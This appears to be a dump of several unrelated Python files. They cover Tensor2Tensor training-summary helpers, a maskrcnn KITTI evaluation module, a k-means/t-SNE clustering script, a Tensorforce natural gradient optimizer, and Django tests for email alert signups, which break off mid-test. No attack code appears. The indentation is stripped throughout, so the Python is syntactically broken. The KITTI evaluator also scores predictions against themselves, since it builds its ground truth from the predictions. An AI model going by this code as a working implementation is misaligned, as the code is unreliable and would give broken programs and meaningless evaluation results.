# TODO(aidangomez): as we move to support more types, update
# common_layers.tpu_safe_image_summary
if tensor.dtype != tf.float32:
tf.logging.warn(
"Currently T2T on TPU only supports ImageSummary of "
"tf.float32-type Tensors. Skipping Tensor "
"%s with dtype %s..." % (tensor.name, tensor.dtype))
continue
# tensor = tf.to_float(tensor)
summary_kwargs["ImageSummary" + name] = tensor
# When no supported summaries are found, don't create host_call. Otherwise,
# TPU outfeed queue would enqueue global_step while host_call doesn't dequeue
# it, eventually causing hang.
if not summary_kwargs:
return None
summary_kwargs["global_step"] = gs_t
log_info("summary_kwargs %s" % str(summary_kwargs))
def host_call_fn(**kwargs):
"""Training host call. Creates summaries for training metrics.
Args:
**kwargs: Dict of {str: Tensor} , with `Tensor` of shape `[batch]`. Must
contain key "global_step" with value of current global_step Tensor.
Returns:
List of summary ops to run on the CPU host.
"""
gs = tf.to_int64(kwargs.pop("global_step")[0])
with tf.contrib.summary.create_file_writer(model_dir).as_default():
with tf.contrib.summary.always_record_summaries():
# We need to use tf.contrib.summary in order to feed the `step`.
for name, value in sorted(six.iteritems(kwargs)):
if name.startswith("ScalarSummary"):
name = name[len("ScalarSummary"):]
tf.contrib.summary.scalar(
name, tf.reduce_mean(tf.to_float(value)), step=gs)
elif name.startswith("ImageSummary"):
name = name[len("ImageSummary"):]
tf.contrib.summary.image(name, value, step=gs)
return tf.contrib.summary.all_summary_ops()
return (host_call_fn, summary_kwargs)
def _del_dict_non_tensors(d):
for k in list(d.keys()):
if not isinstance(d[k], tf.Tensor):
del d[k]
class DummyVariableStore(object):
@contextlib.contextmanager
def as_default(self):
yield
def create_eager_var_store():
if tf.contrib.eager.in_eager_mode():
return variable_scope.EagerVariableStore()
else:
return DummyVariableStore()
def scheduled_sampling(hparams, problem_hparams, dp, sharded_logits, losses,
sharded_features, transformed_features, model):
"""Scheduled sampling."""
target_modality = problem_hparams.modality["targets"]
def sample(x):
"""Multinomial sampling from a n-dimensional tensor."""
vocab_size = target_modality.top_dimensionality
samples = tf.multinomial(tf.reshape(x, [-1, vocab_size]), 1)
reshaped_samples = tf.reshape(samples, common_layers.shape_list(x)[:-1])
return tf.to_int32(reshaped_samples)
def mix_gold_sampled(gold_targets, sampled_targets):
return tf.where(
tf.less(
tf.random_uniform(common_layers.shape_list(sampled_targets)),
hparams.scheduled_sampling_gold_mixin_prob), gold_targets,
sampled_targets)
def sampled_results():
"""Generate scheduled sampling results."""
sampled_targets = dp(sample, sharded_logits)
new_targets = dp(mix_gold_sampled, sharded_features["targets"],
sampled_targets)
new_features = transformed_features
with tf.variable_scope(tf.get_variable_scope(), reuse=True):
with tf.variable_scope(target_modality.name):
new_features["targets"] = target_modality.targets_bottom_sharded(
new_targets, dp)
with tf.variable_scope("body"):
body_outputs, losses = model.model_fn_sharded(new_features)
if not isinstance(losses, dict): # If it's a single extra loss.
losses = {"extra": losses}
with tf.variable_scope(target_modality.name):
new_sharded_logits = target_modality.top_sharded(
body_outputs, sharded_features["targets"], dp)
if "training" not in losses:
training_loss = target_modality.loss_sharded(
sharded_logits, sharded_features["targets"], dp)
training_loss *= problem_hparams.loss_multiplier
losses["training"] = training_loss
return new_sharded_logits, losses
# Run the above conditionally.
prob = hparams.scheduled_sampling_prob
prob *= common_layers.inverse_exp_decay(
hparams.scheduled_sampling_warmup_steps, min_value=0.001)
sharded_logits, losses = tf.cond(
tf.less(tf.random_uniform([]), prob), sampled_results,
lambda: (sharded_logits, losses))
return sharded_logits, losses
def average_sharded_losses(sharded_losses):
"""Average losses across datashards.
Args:
sharded_losses: list<dict<str loss_name, Tensor loss>>. The loss
can be a single Tensor or a 2-tuple (numerator and denominator).
Returns:
losses: dict<str loss_name, Tensor avg_loss>
"""
losses = {}
for loss_name in sorted(sharded_losses[0]):
all_shards = [shard_losses[loss_name] for shard_losses in sharded_losses]
if isinstance(all_shards[0], tuple):
sharded_num, sharded_den = zip(*all_shards)
mean_loss = (
tf.add_n(sharded_num) / tf.maximum(
tf.cast(1.0, sharded_den[0].dtype), tf.add_n(sharded_den)))
else:
mean_loss = tf.reduce_mean(all_shards)
losses[loss_name] = mean_loss
return losses
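# Minimal illustrative example (added for clarity; not part of the original
# module). Call it manually to sanity-check the averaging logic above.
def _example_average_sharded_losses():
  """Two shards each report a scalar "training" loss; the result averages to 2.0.

  Tuple-valued losses would instead be combined as add_n(nums) / add_n(dens).
  """
  sharded = [{"training": tf.constant(1.0)}, {"training": tf.constant(3.0)}]
  return average_sharded_losses(sharded)  # {"training": <tf.Tensor 2.0>}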
def summarize_features(features, num_shards=1):
"""Generate summaries for features."""
if not common_layers.should_generate_summaries():
return
with tf.name_scope("input_stats"):
for (k, v) in sorted(six.iteritems(features)):
if isinstance(v, tf.Tensor) and v.get_shape().ndims > 1:
tf.summary.scalar("%s_batch" % k, tf.shape(v)[0] // num_shards)
tf.summary.scalar("%s_length" % k, tf.shape(v)[1])
nonpadding = tf.to_float(tf.not_equal(v, 0))
nonpadding_tokens = tf.reduce_sum(nonpadding)
tf.summary.scalar("%s_nonpadding_tokens" % k, nonpadding_tokens)
tf.summary.scalar("%s_nonpadding_fraction" % k,
tf.reduce_mean(nonpadding))
_already_logged = set()
def _eager_log(level, *args):
if tf.contrib.eager.in_eager_mode() and args in _already_logged:
return
_already_logged.add(args)
getattr(tf.logging, level)(*args)
def log_debug(*args):
_eager_log("debug", *args)
def log_info(*args):
_eager_log("info", *args)
def log_warn(*args):
_eager_log("warn", *args)
def _compose_custom_getters(getter_a, getter_b):
"""Compose two custom getters.
Example use:
tf.get_variable_scope().set_custom_getter(
compose_custom_getters(tf.get_variable_scope().custom_getter, new_getter))
This composes getters in the same way as creating a new variable scope with
the new_getter, but it does not actually create a new variable scope.
Args:
getter_a: a custom getter - generally from the existing variable scope.
getter_b: a custom getter
Returns:
a custom getter
"""
if not getter_a:
return getter_b
if not getter_b:
return getter_a
def getter_fn(getter, *args, **kwargs):
return getter_b(functools.partial(getter_a, getter), *args, **kwargs)
return getter_fn
def set_custom_getter_compose(custom_getter):
"""Set a custom getter in the current variable scope.
Do not overwrite the existing custom getter - rather compose with it.
Args:
custom_getter: a custom getter.
"""
tf.get_variable_scope().set_custom_getter(
_compose_custom_getters(tf.get_variable_scope().custom_getter,
custom_getter))
def _create_target_modality(modality_dict):
# TODO(trandustin): We require this in order to apply methods utilized
# differently for modalities which are "targets"
# (e.g., modality.target_bottom). In the future, remove need for this
# behavior.
return {k: v for k, v in six.iteritems(modality_dict) if "target" in k}
the-stack_106_23791
# A modified version from the chainercv repository.
# (See https://github.com/chainer/chainercv/blob/master/chainercv/evaluations/eval_detection_voc.py)
from __future__ import division
import os
import torch
import logging
import numpy as np
from tqdm import tqdm
import pycocotools.mask as mask_util
from maskrcnn_benchmark.data.datasets.evaluation.kitti.kittieval import KITTIeval
from maskrcnn_benchmark.modeling.roi_heads.mask_head.inference import Masker
from maskrcnn_benchmark.structures.boxlist_ops import boxlist_iou
from maskrcnn_benchmark.data.datasets.evaluation.coco.coco_eval import COCOResults, check_expected_results
def do_kitti_evaluation(
dataset,
predictions,
box_only,
output_folder,
iou_types,
expected_results,
expected_results_sigma_tol,
):
logger = logging.getLogger("maskrcnn_benchmark.inference")
pred_boxlists = []
gt_boxlists = []
for image_id, prediction in enumerate(predictions):
        img_info = dataset.get_img_info(image_id)
if len(prediction) == 0:
continue
image_width = img_info["width"]
image_height = img_info["height"]
prediction = prediction.resize((image_width, image_height))
pred_boxlists.append(prediction)
gt_boxlist = dataset.get_groundtruth(image_id)
gt_boxlists.append(gt_boxlist)
if box_only:
logger.info("Evaluating bbox proposals")
areas = {"all": "", "small": "s", "medium": "m", "large": "l"}
res = COCOResults("box_proposal")
for limit in [100, 1000]:
for area, suffix in areas.items():
stats = evaluate_box_proposals(pred_boxlists, gt_boxlists, area=area, limit=limit)
key = "AR{}@{:d}".format(suffix, limit)
res.results["box_proposal"][key] = stats["ar"].item()
logger.info(res)
check_expected_results(res, expected_results, expected_results_sigma_tol)
if output_folder:
torch.save(res, os.path.join(output_folder, "box_proposals.pth"))
return
kitti_results = {}
kitti_gts = {}
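    # NOTE (added for clarity): as written, both dicts below are filled from
    # pred_boxlists, so KITTIeval ends up comparing the predictions against
    # themselves. A real evaluation would build kitti_gts from gt_boxlists,
    # provided those boxlists expose the fields used by the prepare_* helpers.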
if "bbox" in iou_types:
logger.info("Preparing bbox results")
kitti_results["bbox"] = prepare_for_kitti_detection(pred_boxlists)
kitti_gts["bbox"] = prepare_for_kitti_detection(pred_boxlists)
if "segm" in iou_types:
logger.info("Preparing segm results")
kitti_results["segm"] = prepare_for_kitti_segmentation(pred_boxlists)
kitti_gts["segm"] = prepare_for_kitti_segmentation(pred_boxlists)
#results = COCOResults(*iou_types)
logger.info("Evaluating predictions")
for iou_type in iou_types:
res = evaluate_predictions_on_kitti(kitti_gts, kitti_results, iou_type)
# results.update(res)
# logger.info(results)
#check_expected_results(results, expected_results, expected_results_sigma_tol)
#
#return results
return res
def evaluate_box_proposals(predictions, gt_boxlists, thresholds=None, area="all", limit=None):
"""Evaluate detection proposal recall metrics. This function is a much
faster alternative to the official COCO API recall evaluation code. However,
it produces slightly different results.
"""
# Record max overlap value for each gt box
# Return vector of overlap values
areas = {
"all": 0,
"small": 1,
"medium": 2,
"large": 3,
"96-128": 4,
"128-256": 5,
"256-512": 6,
"512-inf": 7,
}
area_ranges = [
[0 ** 2, 1e5 ** 2], # all
[0 ** 2, 32 ** 2], # small
[32 ** 2, 96 ** 2], # medium
[96 ** 2, 1e5 ** 2], # large
[96 ** 2, 128 ** 2], # 96-128
[128 ** 2, 256 ** 2], # 128-256
[256 ** 2, 512 ** 2], # 256-512
[512 ** 2, 1e5 ** 2],
] # 512-inf
assert area in areas, "Unknown area range: {}".format(area)
area_range = area_ranges[areas[area]]
gt_overlaps = []
num_pos = 0
for image_id, prediction in enumerate(predictions):
gt_boxes = gt_boxlists[image_id]
gt_areas = torch.as_tensor(gt_boxes.area())
valid_gt_inds = (gt_areas >= area_range[0]) & (gt_areas <= area_range[1])
gt_boxes = gt_boxes[valid_gt_inds]
num_pos += len(gt_boxes)
if len(gt_boxes) == 0:
continue
if len(prediction) == 0:
continue
if limit is not None and len(prediction) > limit:
prediction = prediction[:limit]
prediction = prediction.resize(gt_boxes.size)
overlaps = boxlist_iou(prediction, gt_boxes)
_gt_overlaps = torch.zeros(len(gt_boxes))
for j in range(min(len(prediction), len(gt_boxes))):
# find which proposal box maximally covers each gt box
# and get the iou amount of coverage for each gt box
max_overlaps, argmax_overlaps = overlaps.max(dim=0)
# find which gt box is 'best' covered (i.e. 'best' = most iou)
gt_ovr, gt_ind = max_overlaps.max(dim=0)
assert gt_ovr >= 0
# find the proposal box that covers the best covered gt box
box_ind = argmax_overlaps[gt_ind]
# record the iou coverage of this gt box
_gt_overlaps[j] = overlaps[box_ind, gt_ind]
assert _gt_overlaps[j] == gt_ovr
# mark the proposal box and the gt box as used
overlaps[box_ind, :] = -1
overlaps[:, gt_ind] = -1
# append recorded iou coverage level
gt_overlaps.append(_gt_overlaps)
gt_overlaps = torch.cat(gt_overlaps, dim=0)
gt_overlaps, _ = torch.sort(gt_overlaps)
if thresholds is None:
step = 0.05
thresholds = torch.arange(0.5, 0.95 + 1e-5, step, dtype=torch.float32)
recalls = torch.zeros_like(thresholds)
# compute recall for each iou threshold
for i, t in enumerate(thresholds):
recalls[i] = (gt_overlaps >= t).float().sum() / float(num_pos)
# ar = 2 * np.trapz(recalls, thresholds)
ar = recalls.mean()
return {
"ar": ar,
"recalls": recalls,
"thresholds": thresholds,
"gt_overlaps": gt_overlaps,
"num_pos": num_pos,
}
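def _demo_proposal_recall_at_100(pred_boxlists, gt_boxlists):
    """Illustrative helper (added for clarity, not part of the original file).

    Shows how evaluate_box_proposals can be used to report an AR@100-style
    number; both arguments are assumed to be maskrcnn_benchmark BoxLists.
    """
    stats = evaluate_box_proposals(pred_boxlists, gt_boxlists, area="all", limit=100)
    return stats["ar"].item()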
def prepare_for_kitti_detection(pred_boxlists):
kitti_results = []
for image_id, prediction in enumerate(pred_boxlists):
if len(prediction) == 0:
continue
boxes = prediction.bbox.tolist()
areas = [(b[3]-b[1])*(b[2]-b[0]) for b in boxes]
scores = prediction.get_field("scores").tolist()
labels = prediction.get_field("labels").tolist()
kitti_results.extend(
[
{
"image_id": image_id,
"category_id": labels[k],
"bbox": box,
"score": scores[k],
'area': areas[k],
'id': k + 1,
}
for k, box in enumerate(boxes)
]
)
return kitti_results
def prepare_for_kitti_segmentation(pred_boxlists):
masker = Masker(threshold=0.5, padding=1)
coco_results = []
for image_id, prediction in tqdm(enumerate(pred_boxlists)):
if len(prediction) == 0:
continue
masks = prediction.get_field("mask")
areas = masks.sum(-1).sum(-1)
masks = masker(masks.expand(1, -1, -1, -1, -1), prediction)
masks = masks[0]
scores = prediction.get_field("scores").tolist()
labels = prediction.get_field("labels").tolist()
rles = [mask_util.encode(np.array(mask[0, :, :, np.newaxis], order="F"))[0] for mask in masks]
for rle in rles:
rle["counts"] = rle["counts"].decode("utf-8")
coco_results.extend(
[
{
"image_id": image_id,
"category_id": labels[k],
"segmentation": rle,
"score": scores[k],
'area': areas[k],
'id': k+1,
}
for k, rle in enumerate(rles)
]
)
return coco_results
def evaluate_predictions_on_kitti(kitti_gts, kitti_results, iou_type="bbox"):
kitti_eval = KITTIeval(kitti_gts, kitti_results, iou_type)
kitti_eval.evaluate()
kitti_eval.accumulate()
kitti_eval.summarize()
return kitti_eval
the-stack_106_23792
import os
import numpy as np
from sklearn.cluster import KMeans
from sklearn.decomposition import PCA
from sklearn.manifold import TSNE
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D  # noqa: F401 -- registers the '3d' projection on older matplotlib versions
from sklearn.preprocessing import StandardScaler
import pandas as pd
import json
def plot_3d(vector_array, save_plot_dir):
"""
    Plot the 3D feature distribution from a vector array
    :param vector_array: (N x 3) vector array, where N is the number of images
    :param save_plot_dir: (string) directory to save the plot
    :return: saves a 3D scatter plot of the features to disk
"""
principal_df = pd.DataFrame(data=vector_array, columns=['pc1', 'pc2', 'pc3'])
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
xs = principal_df['pc1']
ys = principal_df['pc2']
zs = principal_df['pc3']
ax.scatter(xs, ys, zs, s=50, alpha=0.6, edgecolors='w')
ax.set_xlabel('pc1')
ax.set_ylabel('pc2')
ax.set_zlabel('pc3')
plt.savefig(save_plot_dir + '/3D_scatter.png')
plt.close()
def plot_2d(vector_array, save_plot_dir):
"""
    Plot the 2D feature distribution from a vector array
    :param vector_array: (N x 2) vector array, where N is the number of images
    :param save_plot_dir: (string) directory to save the plot
    :return: saves a 2D scatter plot of the features to disk
"""
principal_df = pd.DataFrame(data = vector_array, columns = ['pc1', 'pc2'])
fig = plt.figure()
ax = fig.add_subplot(111)
xs = principal_df['pc1']
ys = principal_df['pc2']
ax.scatter(xs, ys, s=50, alpha=0.6, edgecolors='w')
ax.set_xlabel('pc1')
ax.set_ylabel('pc2')
plt.savefig(save_plot_dir + '/2D_scatter.png')
plt.close()
def read_vector(img_dir):
"""
    Read the vectors in a directory into an (N x D) array: N is the number of vectors, D is the vector dimension
    :param img_dir: (string) directory where the feature vectors are stored
    :return: (array, list) N x D vector array and the list of vector file names
"""
vector_files = [f for f in os.listdir(img_dir) if f.endswith(".npz")]
vector_array = []
for img in vector_files:
vector = np.loadtxt(os.path.join(img_dir, img))
vector_array.append(vector)
vector_array = np.asarray(vector_array)
return vector_array, vector_files
def find_best_k(vector_array, save_plot_dir, max_k=100):
"""
    Find the best number of clusters
    :param vector_array: (array) N x D dimension feature vector array
    :param save_plot_dir: (string) path to save the cost figure
    :param max_k: (int) maximum number of clusters to analyze
    :return: saves the elbow (cost vs. k) curve to disk to help choose the number of clusters
"""
cost = []
dim = vector_array.shape[1]
for i in range(1, max_k):
kmeans = KMeans(n_clusters=i, random_state=0)
kmeans.fit(vector_array)
cost.append(kmeans.inertia_)
# plot the cost against K values
plt.plot(range(1, max_k), cost, color='g', linewidth='3')
plt.xlabel("Value of K")
plt.ylabel("Squared Error (Cost)")
plt.savefig(save_plot_dir + '/cost_' + str(dim) + 'D.png')
plt.close()
def k_mean(vector_array, k):
"""
    Apply k-means clustering to assign each feature vector in vector_array to a cluster
    :param vector_array: (array) N x D dimension feature vector array
    :param k: (int) number of clusters
:return: (array) (N x 1) label array
"""
kmeans = KMeans(n_clusters=k, random_state=0)
kmeans.fit(vector_array)
labels = kmeans.labels_
return labels
def reduce_dim_combine(vector_array, dim=2):
"""
    Apply dimensionality reduction (PCA followed by t-SNE) to vector_array
:param vector_array: (array) N x D dimension feature vector array
:param dim: (int) desired dimension after reduction
:return: (array) N x dim dimension feature vector array
"""
# Standardizing the features
vector_array = StandardScaler().fit_transform(vector_array)
# Apply PCA first to reduce dim to 50
pca = PCA(n_components=50)
vector_array = pca.fit_transform(vector_array)
# Apply tSNE to reduce dim to #dim
model = TSNE(n_components=dim, random_state=0)
vector_array = model.fit_transform(vector_array)
return vector_array
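def silhouette_for_k(vector_array, k):
    """Illustrative addition (not part of the original script).

    The elbow plot produced by find_best_k can be ambiguous, so this helper
    computes the silhouette score for a candidate k as a second opinion
    (higher is better, range [-1, 1]).
    """
    from sklearn.metrics import silhouette_score
    labels = k_mean(vector_array, k)
    return silhouette_score(vector_array, labels)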
if __name__ == "__main__":
    # Mode: "investigate" to find the best k, "inference" to cluster
# MODE = "investigate"
MODE = "inference"
# Image vectors root dir
img_dir = "results/image_vectors/"
# Final dimension
dim = 2
for object_name in os.listdir(img_dir):
print("Process %s" % object_name)
# object_name = img_dir.split("/")[-1]
vector_array, img_files = read_vector(os.path.join(img_dir, object_name))
# k_mean(vector_array)
if vector_array.shape[0] >= 450:
            # Apply dimensionality reduction
vector_array = reduce_dim_combine(vector_array, dim)
if MODE == "investigate":
# Plot data distribution after reducing dimension
            if dim == 2:
                save_plot_dir = "visualization/2D/"
                plot_2d(vector_array, save_plot_dir)
            elif dim == 3:
                save_plot_dir = "visualization/3D/"
                plot_3d(vector_array, save_plot_dir)
            else:
                raise ValueError("Unsupported dimension")
            # Plot cost chart to find the best value of k
            find_best_k(vector_array, save_plot_dir)
continue
# Find label for each image
labels = k_mean(vector_array, k=40).tolist()
assert len(labels) == len(img_files), "Not equal length"
label_dict = [{"img_file": img_files[i].replace(".npz", "").replace(object_name + '_', ""), "label": str(labels[i]), "prob": "1.0"} for i in range(len(labels))]
# Save to disk
label_dir = "results/img_cluster/"
label_outpath = os.path.join(label_dir, object_name + ".json")
# os.makedirs(label_outpath, exist_ok=True)
with open(label_outpath, 'w') as fp:
            json.dump({"data": label_dict}, fp)
the-stack_106_23796
# Copyright 2018 Tensorforce Team. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import tensorflow as tf
from tensorforce import util
from tensorforce.core import parameter_modules
from tensorforce.core.optimizers import Optimizer
from tensorforce.core.optimizers.solvers import solver_modules
class NaturalGradient(Optimizer):
"""
Natural gradient optimizer.
"""
def __init__(
self, name, learning_rate, cg_max_iterations=20, cg_damping=1e-3, cg_unroll_loop=False,
summary_labels=None
):
"""
Creates a new natural gradient optimizer instance.
Args:
learning_rate: Learning rate, i.e. KL-divergence of distributions between optimization steps.
cg_max_iterations: Conjugate gradient solver max iterations.
cg_damping: Conjugate gradient solver damping factor.
cg_unroll_loop: Unroll conjugate gradient loop if true.
"""
super().__init__(name=name, summary_labels=summary_labels)
self.learning_rate = self.add_module(
name='learning-rate', module=learning_rate, modules=parameter_modules
)
self.solver = self.add_module(
name='conjugate-gradient', module='conjugate_gradient', modules=solver_modules,
max_iterations=cg_max_iterations, damping=cg_damping, unroll_loop=cg_unroll_loop
)
def tf_step(
self, variables, arguments, fn_loss, fn_kl_divergence, return_estimated_improvement=False,
**kwargs
):
"""
Creates the TensorFlow operations for performing an optimization step.
Args:
variables: List of variables to optimize.
arguments: Dict of arguments for callables, like fn_loss.
fn_loss: A callable returning the loss of the current model.
fn_kl_divergence: A callable returning the KL-divergence relative to the current model.
return_estimated_improvement: Returns the estimated improvement resulting from the
natural gradient calculation if true.
**kwargs: Additional arguments, not used.
Returns:
List of delta tensors corresponding to the updates for each optimized variable.
"""
# Optimize: argmin(w) loss(w + delta) such that kldiv(P(w) || P(w + delta)) = learning_rate
# For more details, see our blogpost:
# https://reinforce.io/blog/end-to-end-computation-graphs-for-reinforcement-learning/
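        # Sketch of the derivation (comment added for clarity): with g = grad(loss)
        # and F the Fisher matrix, the conjugate-gradient solver below returns
        # delta' = -F^{-1} g. The KL constraint 0.5 * delta^T F delta = learning_rate
        # is then satisfied by rescaling: delta = delta' / lambda with
        # lambda = sqrt(c' / learning_rate), where c' = 0.5 * delta'^T F delta'
        # (computed as `constant` further down).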
arguments = util.fmap(function=tf.stop_gradient, xs=arguments)
# Calculates the product x * F of a given vector x with the fisher matrix F.
# Incorporating the product prevents having to calculate the entire matrix explicitly.
def fisher_matrix_product(deltas):
# Gradient is not propagated through solver.
deltas = [tf.stop_gradient(input=delta) for delta in deltas]
# kldiv
kldiv = fn_kl_divergence(**arguments)
# grad(kldiv)
kldiv_gradients = [
tf.convert_to_tensor(value=grad) for grad in tf.gradients(ys=kldiv, xs=variables)
]
# delta' * grad(kldiv)
delta_kldiv_gradients = tf.add_n(inputs=[
tf.reduce_sum(input_tensor=(delta * grad))
for delta, grad in zip(deltas, kldiv_gradients)
])
# [delta' * F] = grad(delta' * grad(kldiv))
return [
tf.convert_to_tensor(value=grad)
for grad in tf.gradients(ys=delta_kldiv_gradients, xs=variables)
]
# loss
loss = fn_loss(**arguments)
# grad(loss)
loss_gradients = tf.gradients(ys=loss, xs=variables)
# Solve the following system for delta' via the conjugate gradient solver.
# [delta' * F] * delta' = -grad(loss)
# --> delta' (= lambda * delta)
deltas = self.solver.solve(
fn_x=fisher_matrix_product, x_init=None, b=[-grad for grad in loss_gradients]
)
# delta' * F
delta_fisher_matrix_product = fisher_matrix_product(deltas=deltas)
# c' = 0.5 * delta' * F * delta' (= lambda * c)
# TODO: Why constant and hence KL-divergence sometimes negative?
half = tf.constant(value=0.5, dtype=util.tf_dtype(dtype='float'))
constant = half * tf.add_n(inputs=[
tf.reduce_sum(input_tensor=(delta_F * delta))
for delta_F, delta in zip(delta_fisher_matrix_product, deltas)
])
learning_rate = self.learning_rate.value()
# Zero step if constant <= 0
def no_step():
zero_deltas = [tf.zeros_like(tensor=delta) for delta in deltas]
if return_estimated_improvement:
return zero_deltas, tf.constant(value=0.0, dtype=util.tf_dtype(dtype='float'))
else:
return zero_deltas
# Natural gradient step if constant > 0
def apply_step():
# lambda = sqrt(c' / c)
lagrange_multiplier = tf.sqrt(x=(constant / learning_rate))
# delta = delta' / lambda
estimated_deltas = [delta / lagrange_multiplier for delta in deltas]
# improvement = grad(loss) * delta (= loss_new - loss_old)
estimated_improvement = tf.add_n(inputs=[
tf.reduce_sum(input_tensor=(grad * delta))
for grad, delta in zip(loss_gradients, estimated_deltas)
])
# Apply natural gradient improvement.
applied = self.apply_step(variables=variables, deltas=estimated_deltas)
with tf.control_dependencies(control_inputs=(applied,)):
# Trivial operation to enforce control dependency
estimated_delta = [
util.identity_operation(x=estimated_delta)
for estimated_delta in estimated_deltas
]
if return_estimated_improvement:
return estimated_delta, estimated_improvement
else:
return estimated_delta
# Natural gradient step only works if constant > 0
skip_step = constant > tf.constant(value=0.0, dtype=util.tf_dtype(dtype='float'))
return self.cond(pred=skip_step, true_fn=no_step, false_fn=apply_step)
the-stack_106_23797
import re
from urlparse import parse_qs, urlparse
from pyquery import PyQuery as pq
from django.conf import settings
from django.core import mail
from django.test import TransactionTestCase
from frontend.models import EmailMessage
from frontend.models import OrgBookmark
from frontend.models import SearchBookmark
from allauth.account.models import EmailAddress
class TestAlertViews(TransactionTestCase):
fixtures = ['chemicals', 'sections', 'ccgs',
'practices', 'prescriptions', 'measures']
def _post_org_signup(self, entity_id, email='[email protected]'):
form_data = {'email': email}
if len(entity_id) == 3:
url = "/ccg/%s/" % entity_id
form_data['pct'] = entity_id
else:
url = "/practice/%s/" % entity_id
form_data['practice'] = entity_id
return self.client.post(
url, form_data, follow=True)
def _post_search_signup(self, url, name, email='[email protected]'):
form_data = {'email': email}
form_data['url'] = url
form_data['name'] = name
return self.client.post(
'/analyse/', form_data, follow=True)
def _create_user_and_login(self, email, is_superuser=False):
from allauth.utils import get_user_model
user = get_user_model().objects.create(
username=email, email=email, is_active=True)
user.set_unusable_password()
if is_superuser:
user.is_superuser = True
user.save()
EmailAddress.objects.create(user=user,
email=email,
primary=True,
verified=True)
self.client.force_login(
user, 'django.contrib.auth.backends.ModelBackend')
return user
def test_search_email_invalid(self):
response = self._post_search_signup('stuff', 'mysearch', email='boo')
self.assertContains(
response, "Please enter a valid email address")
def test_search_email_sent(self):
response = self._post_search_signup('stuff', 'mysearch')
self.assertContains(
response, "Check your email and click the confirmation link")
self.assertEqual(len(mail.outbox), 1)
self.assertIn("about mysearch", mail.outbox[0].body)
def test_search_email_copy_kept(self):
self._post_search_signup('stuff', 'mysearch')
msg = EmailMessage.objects.first()
self.assertIn("about mysearch", msg.message.body)
self.assertIn("[email protected]", msg.to)
def test_search_bookmark_created(self):
self.assertEqual(SearchBookmark.objects.count(), 0)
self._post_search_signup('stuff', '%7Emysearch')
self.assertEqual(SearchBookmark.objects.count(), 1)
bookmark = SearchBookmark.objects.last()
self.assertEqual(bookmark.url, 'stuff')
# Check the name is URL-decoded
self.assertEqual(bookmark.name, '~mysearch')
# But it's not approved (until they log in)
self.assertFalse(bookmark.approved)
def test_search_follow_email_link(self):
self._post_search_signup('stuff', 'mysearch')
confirm_url = re.match(r".*http://.*(/accounts/confirm-email/.*?)\s",
mail.outbox[0].body, re.DOTALL).groups()[0]
response = self.client.get(confirm_url, follow=True)
self.assertTemplateUsed(response, 'analyse.html')
self.assertContains(
response, "subscribed to monthly alerts about <em>mysearch</em>")
self.assertTrue(response.context['user'].is_active)
# The act of logging in approves bookmarks
bookmark = SearchBookmark.objects.last()
self.assertTrue(bookmark.approved)
def test_ccg_email_invalid(self):
response = self._post_org_signup('03V', email='boo')
self.assertContains(
response, "Please enter a valid email address")
def test_ccg_email_sent(self):
email = '[email protected]'
response = self._post_org_signup('03V', email=email)
self.assertTrue(response.context['user'].is_anonymous())
self.assertContains(
response, "Check your email and click the confirmation link")
self.assertEqual(len(mail.outbox), 1)
self.assertIn(email, mail.outbox[0].to)
self.assertIn("about prescribing in NHS Corby", mail.outbox[0].body)
def test_ccg_bookmark_added_when_already_logged_in(self):
email = '[email protected]'
self._create_user_and_login(email)
response = self._post_org_signup('03V', email=email)
self.assertEqual(response.context['user'].email, email)
self.assertTemplateUsed(response, 'measures_for_one_ccg.html')
self.assertContains(response, "Thanks, you're now subscribed")
self.assertEqual(len(mail.outbox), 0)
self.assertEqual(OrgBookmark.objects.count(), 1)
self.assertTrue(OrgBookmark.objects.last().approved)
def test_bookmark_added_by_other_user_is_unapproved(self):
# Create user A
user_a = self._create_user_and_login('[email protected]')
# Create user B
self._create_user_and_login('[email protected]')
# Now user B should not be able to sign up user A to anything
self._post_org_signup('03V', email='[email protected]')
created_bookmark = OrgBookmark.objects.last()
# Note that user A has had a bookmark created (there's nothing
# to stop anyone signing anyone else up....)
self.assertTrue(created_bookmark.user.email, '[email protected]')
# And they should have an email
self.assertIn('[email protected]', mail.outbox[0].to)
# ...but it's an unapproved bookmark...
self.assertFalse(created_bookmark.approved)
# ...and user A must reconfirm their identity
self.assertFalse(user_a.emailaddress_set.first().verified)
def test_ccg_bookmark_added_for_new_user_when_already_logged_in(self):
self._create_user_and_login('[email protected]')
response = self._post_org_signup('03V', email='[email protected]')
self.assertTrue(response.context['user'].is_anonymous())
confirm_url = re.match(r".*http://.*(/accounts/confirm-email/.*?)\s",
mail.outbox[0].body, re.DOTALL).groups()[0]
response = self.client.get(confirm_url, follow=True)
self.assertEqual(response.context['user'].email, '[email protected]')
def test_ccg_bookmark_created(self):
self.assertEqual(OrgBookmark.objects.count(), 0)
self._post_org_signup('03V')
self.assertEqual(OrgBookmark.objects.count(), 1)
bookmark = OrgBookmark.objects.last()
self.assertEqual(bookmark.pct.code, '03V')
def test_ccg_follow_email_link(self):
self._post_org_signup('03V', '[email protected]')
confirm_url = re.match(r".*http://.*(/accounts/confirm-email/.*?)\s",
mail.outbox[0].body, re.DOTALL).groups()[0]
response = self.client.get(confirm_url, follow=True)
self.assertEqual(response.context['user'].email, '[email protected]')
self.assertContains(
response, "subscribed to monthly alerts about "
"<em>prescribing in NHS Corby")
self.assertTrue(response.context['user'].is_active)
def test_practice_email_invalid(self):
response = self._post_org_signup('P87629', email='boo')
self.assertContains(
response, "Please enter a valid email address")
def test_practice_email_sent(self):
response = self._post_org_signup('P87629')
self.assertContains(
response, "Check your email and click the confirmation link")
self.assertEqual(len(mail.outbox), 1)
self.assertIn("about prescribing in 1/ST Andrews", mail.outbox[0].body)
def test_practice_bookmark_created(self):
self.assertEqual(OrgBookmark.objects.count(), 0)
self._post_org_signup('P87629')
self.assertEqual(OrgBookmark.objects.count(), 1)
bookmark = OrgBookmark.objects.last()
self.assertEqual(bookmark.practice.code, 'P87629')
def test_practice_follow_email_link(self):
self._post_org_signup('P87629')
confirm_url = re.match(r".*http://.*(/accounts/confirm-email/.*?)\s",
